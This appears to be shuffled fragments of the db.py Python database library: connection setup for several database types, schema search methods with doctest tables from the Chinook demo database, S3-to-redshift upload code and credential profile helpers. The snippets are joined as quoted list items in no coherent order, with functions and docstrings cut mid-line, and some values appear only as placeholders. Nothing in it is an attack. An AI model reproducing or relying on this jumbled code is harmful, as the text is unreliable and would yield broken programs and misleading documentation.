(table_name, sql) in self.cur: rgx =", "that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to", "def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000,", "db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results = db.find_table(\"*\") # returns", "metatables (at least ones that fit into our framework), so we're going to", "= DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\",", "InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine", "is None: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite,", "http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite')", "col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if", "% schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta", "# lazily importing boto only if necessary here. if bucket_location is None: bucket_location", "''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347", "This will return any handlebars queries as a single data frame. limit: int", "| NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice |", "\"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID,", "ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+", "| Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns", "# returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns", "db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name", "covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost',", "for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict", "the database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return", "sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']]", "and Wild 0.99 4 Princess of the Dawn 0.99 5 Put The Finger", "not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache", "Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k]", "union=True, limit=None): \"\"\" Query your database with a raw string. Parameters ---------- q:", "second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys =", "\"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0", "import sys from collections import defaultdict import pandas as pd import pybars from", "is running on. defaults to default port for db. portgres: 5432 redshift: 5439", "= db.find_table(\"*\") # returns everything \"\"\" tables = [] for table in self.tables:", "| | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all", "Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee |", "bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces.", "args=(i, )) t.start() threads.append(t) # join all threads for t in threads: t.join()", "db admin you might actually want to query the system tables. limit: int,", "if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it is installed\")", "table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the", "= {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata:", "credentials, plus the database properties to your db.py profile.\"\"\" if len(self.tables) > 0:", "you want to return Examples ---------- >>> from db import DemoDB >>> db", "= \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds)", "| NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine |", "arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg", "q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM", "@property def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename:", "for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables:", "str glob pattern for what you're looking for data_type: str, list (optional) specify", "Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType", "in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert =", "else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self,", "db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID,", "if isinstance(data_type, str): data_type = [data_type] cols = [] for table in self.tables:", "| | InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId |", "k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO()", "table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as", "\"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\":", "= db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results = db.find_table(\"*\") #", "# second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate", "True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except", "TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track", "| Track | MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER", "wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for", "| Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/", "True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL", "(i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f)", "len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For", "try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd))", "self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and", "| Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER", "Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | |", "= True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect", "if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as", "AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock (We Salute You)", "to operate). This includes things like schema definitions. Most of you probably don't", "\"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg =", "self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype", "printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location", "limitless. Bradley Cooper style.) keys_per_column: int, None Default number of keys to display", "| Table | Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId", "ensure it is installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\",", "= 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif", "= exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to", "None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as", "','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q", "into pieces. according to amazon, this is # much faster when it comes", "attempt to import the relevant database libraries # TODO: maybe add warnings? try:", "self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't", "we can't do this in the function definition because we're # lazily importing", "import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>>", ">>> q = ''' ... SELECT ... {{#cols}} ... {{#if @last}} ... {{", "del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given", "\"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username", "columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table |", "can override it by adding limit={X} to the `query` method, or by passing", "5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in", "| SupportRepId | INTEGER | | Customer | CustomerId | INTEGER | |", "and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con,", "foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name,", "{0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and", "for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return", "database credentials, plus the database properties to your db.py profile.\"\"\" if len(self.tables) >", "| INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack |", "to return in a query. This is used by the DB.query method. You", "load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are stored in", "arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor()", "search through your database's schema for a table. Parameters ----------- search: str glob", "the table if it already exists chunk_size: int (10000) Number of DataFrame chunks", "Artist | ArtistId | INTEGER | | Customer | SupportRepId | INTEGER |", "| | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId |", "try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using", "them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = [] tables", "> {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self):", "AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify", "database needs in order to operate). This includes things like schema definitions. Most", "DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks up to the", "Customer | SupportRepId | INTEGER | | Customer | CustomerId | INTEGER |", "CustomerId | INTEGER | | Employee | EmployeeId | INTEGER | | Genre", "INTEGER | | Track | MediaTypeId | INTEGER | | Track | GenreId", "is present, set the bucket_location to default. # we can't do this in", "table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name] = []", "a file. Parameters ---------- filename: str A SQL script data: list, dict Optional", "database's schema for a table. Parameters ----------- search: str glob pattern for what", "| INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice |", "self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master", "is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys =", "in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql", "self.cur: # second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) #", "\"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con,", "foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys:", "NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"])", "db = DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name,", "into our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This", "Let's Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99", "[row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in", "fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with", "9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ... t.Name,", "= username self.password = password self.hostname = hostname self.port = port self.filename =", "name, sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN", "except: raise Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name, f))", "plus the database properties to your db.py profile.\"\"\" if len(self.tables) > 0: f", "s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) #", "Port the database is running on. defaults to default port for db. portgres:", "unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None,", ">>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"}", "redshift via s3. Parameters ---------- name: str name for your shiny new table", "psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False try: import", "out column metadata for all tables as list of tuples if told to", "ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None,", "TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema for", "prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties", "| InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | |", "DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"):", "sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\")", "# we'll create the table ONLY if it doens't exist sql = sql.replace(\"CREATE", "you might actually want to query the system tables. limit: int, None Default", "= creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas =", "in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select", "| INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine |", "row[2])) # find for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\")", "port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError:", "int Port the database is running on. defaults to default port for db.", "| Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | |", "t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10)", "the table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE", "None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from", "execute data: list, dict Optional argument for handlebars-queries. Data will be passed to", "| | Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId |", "dataframe to redshift via s3. Parameters ---------- name: str name for your shiny", "Be Rock 1 4 5 Big Ones 3 \"\"\" if data: q =", "bool (False) option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location", "= {} # pull out column metadata for all tables as list of", "you're a db admin you might actually want to query the system tables.", "to the Wall 2 2 2 3 Fast As a Shark 3 2", "where rows are not in the same order, making doctest fail. db.find_column(\"Name\") #", "dict): query = template(data) query = str(query) else: return q return query def", "= os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function", "MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER |", "As a Shark 0.99 3 Restless and Wild 0.99 4 Princess of the", "| Employee | ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER", "template(data) query = str(query) else: return q return query def query(self, q, data=None,", "\"\"\" Aggresively search through your database's schema for a table. Parameters ----------- search:", "exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port =", "#this way users with permission on specific buckets can use this feature bucket_name", "username self.password = password self.hostname = hostname self.port = port self.filename = filename", "Could not find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could", "profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def", "SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ...", "to each table to the table name in dict for (table_schema, table_name, column_name,", "str Query string to execute data: list, dict Optional argument for handlebars-queries. Data", "bucket. This should match your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\":", "user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars", "db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def", "Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER |", "our Columns, and attach to each table to the table name in dict", "if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self):", "... GROUP BY ... table_name ... ''' >>> data = [ ... {\"name\":", "return any handlebars queries as a single data frame. limit: int Number of", "Should sort in some way for all those doctests to be viable... -=", "= True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC", "boto.s3.connection import Location # if boto is present, set the bucket_location to default.", "| INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist |", "db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port,", "2 Fast As a Shark 0.99 3 Restless and Wild 0.99 4 Princess", "environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either", "2.7 except: from io import StringIO # Python 3.3+ import uuid import re", "defaultdict(list) for rel in self.cur: # second value in relationship tuple is the", "_ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)", "len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should", "] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2", "pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname", "`AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument", "SQLite doesn't come with any metatables (at least ones that fit into our", ") conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password", "ArtistId | INTEGER | | Artist | ArtistId | INTEGER | | Customer", "5 6 Put The Finger On You 1 1 6 7 Let's Get", "for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join", "| | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str):", "None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for", "self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print", "password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if", "<BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334", "self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively", "2. use a single query for getting all key relationships # 3. use", "Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides", "= [] tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master where", "profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of", "NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are", "'{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM ... {{", "open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name,", "Finger On You 0.99 6 Let's Get It Up 0.99 7 Inject The", "u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\"", "except Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception:", "slices per node, so if running 2 nodes you will want chunk_size=4, 8,", "you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if", "in self.cur: # second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel)", "defaults to default port for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite:", "random issue where rows are not in the same order, making doctest fail.", "PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId | INTEGER |", "self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find", "Table | Column Name | Type | +-------------+----------------+--------------+ | Customer | Address |", "str Preconfigured database credentials / profile for how you like your queries exclude_system_tables:", "tables = {} # generate our Columns, and attach to each table to", "__repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\"", "q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta,", "name for your shiny new table df: DataFrame data frame you want to", "s3: S3 alternative to using keys, you can use an S3 object print_sql:", "= threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t in", "EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas", "our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'],", "want to query the system tables. limit: int, None Default number of records", "in order to operate). This includes things like schema definitions. Most of you", "| Genre | Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120)", "DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns)", "and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema", "use_cache=False): \"\"\" Pulls your database's schema again and looks for any new tables", "in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg)", "s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials plus", "col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas,", "used by the DB.query method. You can override it by adding limit={X} to", "raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is installed\") creds", "admin you might actually want to query the system tables. limit: int, None", "{0} to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size)", "1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6", "in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads", "queries exclude_system_tables: bool Whether or not to include \"system\" tables (the ones that", "hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname =", ">>> results = db.find_table(\"*\") # returns everything \"\"\" tables = [] for table", "temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = []", "\"\"\" Query your database from a file. Parameters ---------- filename: str A SQL", "DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db =", "| EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) | |", "To Rock We Salute You 1 1 2 Balls to the Wall 2", "mssql, or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and", "as either function argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY,", "to control the rendering of PrettyTable a bit. None means that you'll have", "= Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is", "driver if self.dbtype is None: raise Exception(\"Database type not specified! Must select one", "| Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+", "tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta =", "1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619", "sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES", "\"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\":", "self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in relationship", "None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key))", "Rock (We Salute You) 1 1 1 2 Balls to the Wall 2", "to chunk the file into pieces. according to amazon, this is # much", "to `DB()`. None indicates that there will be no limit (That's right, you'll", "with permission on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if", "pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try:", "elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t", "if it already exists chunk_size: int (10000) Number of DataFrame chunks to upload", "= DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db", "function definition because we're # lazily importing boto only if necessary here. if", "INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId", "right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of", "chunks to upload and COPY from S3. Upload speed is *much* faster if", "available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from", "self._try_command(sql) self.con.commit() # perform the \\COPY here. the s3 argument is a prefix,", "self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise", "Salute You 8 For Those About To Rock We Salute You 9 For", "for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS", "t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS", "__str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return", "or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format(", "into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def", "| INTEGER | | Employee | Address | NVARCHAR(70) | | Genre |", "TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform", "the temporary transfer s3 bucket. This should match your redshift cluster's region. Examples", "= template(data) query = str(query) else: return q return query def query(self, q,", "u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None,", "Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id", "sql) in self.cur: rgx = \"FOREIGN KEY 